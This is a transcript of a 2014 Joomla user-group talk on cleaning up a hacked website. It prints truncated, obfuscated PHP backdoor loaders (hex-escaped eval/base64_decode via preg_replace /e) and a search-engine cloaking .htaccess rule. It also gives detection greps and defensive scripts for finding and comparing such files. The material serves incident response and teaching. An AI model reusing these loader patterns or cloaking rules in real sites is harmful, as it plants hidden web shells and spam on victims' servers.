Help, my website has been hacked - Joomla User Group Den Bosch 2014

Help, my site has been hacked... now what? by Peter Martin www.db8.nl / @pe7er

Description

During a routine check, Peter discovered that a client's website contained some strange new files. After several thorough scans he found that the website had been "hacked". What should you do when your website has been hacked? In this presentation (given at Joomla User Group Den Bosch), Peter discusses why websites get hacked, shows a few website hacks, and demonstrates how to restore a website.

Transcript of Help, my website has been hacked - Joomla User Group Den Bosch 2014

Help, my site has been hacked... now what?

by Peter Martin www.db8.nl / @pe7er

Joomla User Group Den Bosch – 1 December 2014

1. Why hack?

2. Website hacked

3. SSH connection

4. Procedure
– Backup
– Analysis
– Recovery

Website hacked

Why hack?

1. Credit cards

2. Information

3. Graffiti

4. Phishing

5. Spam

6. Backlinks

7. DDoS

8. CPU

9. Trade

Website hacked

Website hacked 1

Client

Hosting provider

opencoffee website has been hacked

?!?! Other sites on the same IP too!?!

(laconic) just restore index.php

I hereby cancel my hosting, asap!

Website hacked 2

Client website

Fabrik

?!?! from: @ .br to: @ .br !?!

E-mail bounced for a few days

Spam script, timestamp in access log

Front-end upload: File format not allowed!

Website hacked 3

Client

SSH into the website

Backup (just in case)

?!?! Size differs from the previous backup?

Suspicious PHP files & viagra sitemap.xml

Admin access to the website for me?

Backdoor 1

/includes/xmlrpc.php - 07 September 2014 23:15:01

<?php
# GNU LESSER GENERAL PUBLIC LICENSE
# Version 3, 29 June 2007
#
# Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
# Everyone is permitted to copy and distribute verbatim copies
# of this license document, but changing it is not allowed.
[..]
#
#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>
$auth_pass = "52fd812f55cb3118bb3bfe575b59a02d";
$color = "#df5";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'[..]

Not in the backup of 18 October 2014!

Hacked on 19 October 2014

Payload 1

.htaccess - 09 November 11:45:48

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing|spaumbot) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /main.php?p=$1 [L]

##
# @package    Joomla
# @copyright  Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.
# @license    GNU General Public License version 2 or later; see LICENSE.txt
##

Added

Hack via backdoor by a 2nd hacker

Payload 2

main.php - 10 July 2013 11:25:27

<?php Error_Reporting(0); $xTBYAB76GYfo="[..]+jPuv0ZCSPco4yHZS4goVte05ZaSQG+kdELd9Sz2YzKa3nwIRHiW9qulHKSSXNiggPBGFb0SQPUZPP4iNUBuLj2JSJG6RItv9Dw==";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0doeVRXeEdkbHByYkRSVV[..]

Hack via backdoor by a 2nd hacker, added on 9 November 2014.

Decoded: preg_replace("/.*/e","eval(base64_decode('

Payload 3

sitemap.xml - 9 November 2014 11:50:42

<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
    <loc>http://www.voorbeeld.nl/viagra-professional-100mg/</loc>
    <lastmod>2014-11-09</lastmod>
    <changefreq>monthly</changefreq>
    <priority>1.0</priority>
  </url>
  <url>
    <loc>http://www.voorbeeld.nl/long-term-side-effects-of-cialis/</loc>
    <lastmod>2014-11-09</lastmod>
    <changefreq>monthly</changefreq>
    <priority>1.0</priority>
  </url>
  <url>
    <loc>http://www.voorbeeld.nl/price-of-viagra-100mg-tablet/</loc>
    <lastmod>2014-11-09</lastmod>
    <changefreq>monthly</changefreq>
    <priority>1.0</priority>
  </url>
</urlset>

Hack via backdoor by a 2nd hacker, added on 9 November 2014.

590 spam links

Backdoor 2

/libraries/joomla/session/cache.php - 19 August 2013 14:45:46

<?php Error_Reporting(0); $x0bp6Rx0vRH="[..]";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXN

Via backdoor by a 2nd hacker, added on 9 November 2014.

Decoded: preg_replace("/.*/e","eval(base64_decode('

Modified!

Backdoor 3

/administrator/fs-login.phtml - 09 November 2014 11:45:48

<?php Error_Reporting(0);$xJdU8NfauOq="[..]N1BmC06baOOvUABzLnQQOPayaWUZNuVsvz/RKeu0tYqggU6iMX1/8L";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNj

Via backdoor by a 2nd hacker, added on 9 November 2014.

Decoded: preg_replace("/.*/e","eval(base64_decode('

Backdoor 4-9

Added on 09 November 2014 11:45:48

/language/comnon.phtml
/layouts/fedit.php
/libraries/fedit.php
/logs/comnon.php
/plugins/fs-login.phtml
/tmp/Iicense.php

contain:

<?php Error_Reporting(0);

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28

Via backdoor by a 2nd hacker, added on 9 November 2014.

Consequence

SSH connection

Terminal

Text Terminal

“TTY” TeleTYpewriter

Terminal

Windows
– SSH program: PuTTY

Mac OSX
– Built-in: “Terminal”

Linux
– Built-in terminal emulator

SSH

Secure SHell

uses public-key cryptography (authentication & secure data communication)

peter@computer:~$ ssh [email protected]

SSH

peter@computer:~$ ssh [email protected]

The authenticity of host 'example.com (93.184.216.119)' can't be established.
RSA key fingerprint is 10:51:ab:f5:d7:[..]:17:16:1f:22:33.
Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added 'example.com,93.184.216.119' (RSA) to the list of known hosts.
[email protected]'s password:

[email protected] ~ $

Procedure

Backup

Backup files

Backup from before the hack?
– Hosting provider?
– Akeeba Backup (offline)?

Make a backup of the current situation (including the hack!)
– Akeeba Backup
– Rsync / MySQL dump

rsync

Remote synchronization
– rsync from “source” to “destination”

$ rsync -arv [email protected]:~/joomla-cms/ /var/www/joomla-cms-backup/

username @ server : folder

MySQL Dump

$ mysqldump -u gebruikersnaam -p databasenaam > bestand-met-sql-uitvoer.txt

(gebruikersnaam = user name, databasenaam = database name, bestand-met-sql-uitvoer.txt = file that receives the SQL output)

Analysis

Analysis

● Software versions:
– CMS (Joomla version?)
– Versions of 3rd-party extensions?

● Access log files
– Strange POST requests?

Analysis

● New files on the server
– .php files in the /images/ folder?

● Files with strange code
– Base64 decode

● Compare files with the original files
– diff

New files

Created in the last 7 days (-ctime tests the inode change time, which is set on creation and again on any later change to content, owner or permissions):

find . -type f -ctime -7

Recently modified

Modified between 7 and 3 days ago:

find . -type f -mtime -7 ! -mtime -3
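
The payload and backdoor slides show files dated 2013 that were added on 9 November 2014, so a search on -mtime alone can miss them. The sketch below is an added example, not part of the original slides: it lists files whose inode change time is recent while their modification time is much older. It assumes GNU find (-printf); the function names, thresholds and sample files are illustrative.

```sh
#!/bin/sh
# Added example (not from the slides). Assumes GNU find for -printf.

# find_backdated DIR [RECENT_DAYS] [GAP_DAYS]
#   Prints files whose ctime (inode change) lies within the last RECENT_DAYS
#   days while their mtime is at least GAP_DAYS older than that ctime.
#   mtime can be set freely with touch(1); ctime is maintained by the kernel.
find_backdated() {
    dir=$1
    recent_days=${2:-7}
    gap_days=${3:-30}
    now=$(date +%s)
    # Fields: mtime epoch, ctime epoch, mtime date, ctime date, path
    find "$dir" -type f -printf '%T@ %C@ %TY-%Tm-%Td %CY-%Cm-%Cd %p\n' |
    awk -v now="$now" -v recent="$recent_days" -v gap="$gap_days" '
        {
            mtime = $1; ctime = $2
            path = $0
            sub(/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ /, "", path)   # keeps paths with spaces
            if (now - ctime <= recent * 86400 && ctime - mtime >= gap * 86400)
                printf "mtime=%s ctime=%s %s\n", $3, $4, path
        }'
}

# Constructed demo: one ordinary file and one file backdated with touch.
demo_backdated() {
    d=$(mktemp -d)
    echo '<?php // constructed sample' > "$d/index.php"
    echo '<?php // constructed sample' > "$d/cache.php"
    touch -t 201308191445.46 "$d/cache.php"   # mtime becomes 2013, ctime stays now
    find_backdated "$d" 7 30
    rm -rf "$d"
}
demo_backdated
```

Run it on the live server rather than on an rsync copy, because copying gives every file a fresh ctime. Files unpacked from an archive legitimately carry old modification times, so treat hits as leads to check against the access log.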

grep

● Search for specific strings

grep -r "eval" /var/www/joomla-cms | grep "base64_decode"

● Or

grep -r "preg_replace" /var/www/joomla-cms | grep -F '\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'

grep -r "eval" /var/www/joomla-cms | grep "<?php Error_Reporting(0);"
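
The literal search strings above only match the exact encodings shown on the slides. As an added example (not part of the original presentation), the script below first decodes \xNN escapes and then looks for eval( wrapped around base64_decode( with an optional gzinflate(, which covers both variants on the backdoor slides. Function names and the sample files are constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the slides. Sample files are constructed and inert.

# decode_hex_escapes FILE: print FILE with each \xNN escape turned into its character.
decode_hex_escapes() {
    awk '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    {
        out = ""; s = $0
        while (match(s, /\\x[0-9A-Fa-f][0-9A-Fa-f]/)) {
            code = hexval(substr(s, RSTART + 2, 1)) * 16 + hexval(substr(s, RSTART + 3, 1))
            out = out substr(s, 1, RSTART - 1) sprintf("%c", code)
            s = substr(s, RSTART + RLENGTH)
        }
        print out s
    }' "$1"
}

# scan_webroot DIR: list .php/.phtml files that, after decoding, pass
# base64_decode() output to eval(), optionally through gzinflate().
scan_webroot() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' \) | LC_ALL=C sort |
    while IFS= read -r f; do
        if decode_hex_escapes "$f" | grep -Eq 'eval\((gzinflate\()?base64_decode\('; then
            printf '%s\n' "$f"
        fi
    done
}

# Constructed tree: two obfuscated stubs (payload replaced by a placeholder)
# and one clean file that uses base64_decode() legitimately.
make_sample_tree() {
    mkdir -p "$1/includes" "$1/tmp"
    cat > "$1/includes/xmlrpc.php" <<'EOF'
<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'PLACEHOLDER'");
EOF
    cat > "$1/tmp/Iicense.php" <<'EOF'
<?php Error_Reporting(0); preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'PLACEHOLDER'");
EOF
    cat > "$1/index.php" <<'EOF'
<?php $data = base64_decode($stored); echo strlen($data);
EOF
}

demo_scan() {
    d=$(mktemp -d)
    make_sample_tree "$d"
    scan_webroot "$d" | sed "s|^$d/||"
    rm -rf "$d"
}
demo_scan
```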

NeoPi

Detection of hidden web shell code

Requires Python 2.6

Install via git:

$ git clone https://github.com/Neohapsis/NeoPI.git

Run the script:

$ /var/www/NeoPI/neopi.py -Aa /var/www/joomla-cms

diff

Compare the website's files with the original files:

– Provide a folder with the original Joomla + extensions
  ● Old backup, or
  ● Fresh installation of Joomla + extensions

– Provide a folder with the hacked website

Use diff software to compare:

– Linux + OSX: Meld

– Windows: WinMerge

Recovery

● Remove all hacker scripts
– Look beyond the “hack” itself, because of backdoor scripts

● Bring all software up to date
– Joomla
– 3rd-party extensions

Recovery

● Replace passwords
– MySQL database password
– FTP password
– Passwords of Joomla users

● Optional extra check:
– Compare a backup of the cleaned website with a fresh Joomla installation → diff
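
The comparison from the diff slide and the extra check above (cleaned site against a fresh Joomla installation) can also be done on the command line. The script below is an added example, not part of the original slides: it builds a checksum manifest of both folders and reports what was added, changed or removed. The function names and the sample tree are constructed for illustration.

```sh
#!/bin/sh
# Added example (not from the slides). POSIX cksum is used as a change
# detector here, not as a cryptographic integrity check.

# manifest DIR: print "<crc> <size> ./relative/path" for every file in DIR.
manifest() {
    ( cd "$1" && find . -type f -exec cksum {} + )
}

# compare_site CLEAN SITE: report files in SITE that are absent from CLEAN
# (ADDED) or differ in content (CHANGED), and files absent from SITE (MISSING).
compare_site() {
    ref=$(mktemp)
    manifest "$1" > "$ref"
    manifest "$2" | awk -v ref="$ref" '
        function path(line) { sub(/^[0-9]+ [0-9]+ /, "", line); return line }
        BEGIN { while ((getline l < ref) > 0) clean[path(l)] = l }
        {
            p = path($0); seen[p] = 1
            if (!(p in clean))       print "ADDED   " p
            else if (clean[p] != $0) print "CHANGED " p
        }
        END { for (p in clean) if (!(p in seen)) print "MISSING " p }' |
    LC_ALL=C sort
    rm -f "$ref"
}

# Constructed demo: a clean reference tree and a site tree with one altered
# core file, one PHP file in /images/ and one file removed.
demo_compare() {
    d=$(mktemp -d)
    mkdir -p "$d/clean/includes" "$d/site/includes" "$d/site/images"
    echo '<?php // index' > "$d/clean/index.php"
    cp "$d/clean/index.php" "$d/site/index.php"
    echo 'license text' > "$d/clean/LICENSE.txt"
    echo '<?php // framework' > "$d/clean/includes/framework.php"
    echo '<?php // framework, altered' > "$d/site/includes/framework.php"
    echo '<?php // upload' > "$d/site/images/logo.php"
    compare_site "$d/clean" "$d/site"
    rm -rf "$d"
}
demo_compare
```

Legitimate uploads and the site's own configuration will also show up as ADDED; look first at executable types such as .php and .phtml and at anything CHANGED inside core directories.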

Recovery

● Submit your own .xml sitemap to Google

● Get spam pages out of search engines faster?

"410 Gone error" via .htaccess:

RewriteRule \S*viagra+\S* - [G]
RewriteRule \S*cialis+\S* - [G]
RewriteRule \S*pharmacy+\S* - [G]
RewriteRule \S*propecia+\S* - [G]
RewriteRule \S*drugs+\S* - [G]

Conclusion

1. Why?

2. Website hacked

3. SSH connection

4. Procedure
– Backup
– Analysis
– Recovery

Questions?

Peter Martin

e-mail: info at db8.nl

website: www.db8.nl

twitter: @pe7er

Presentation: http://www.db8.nl
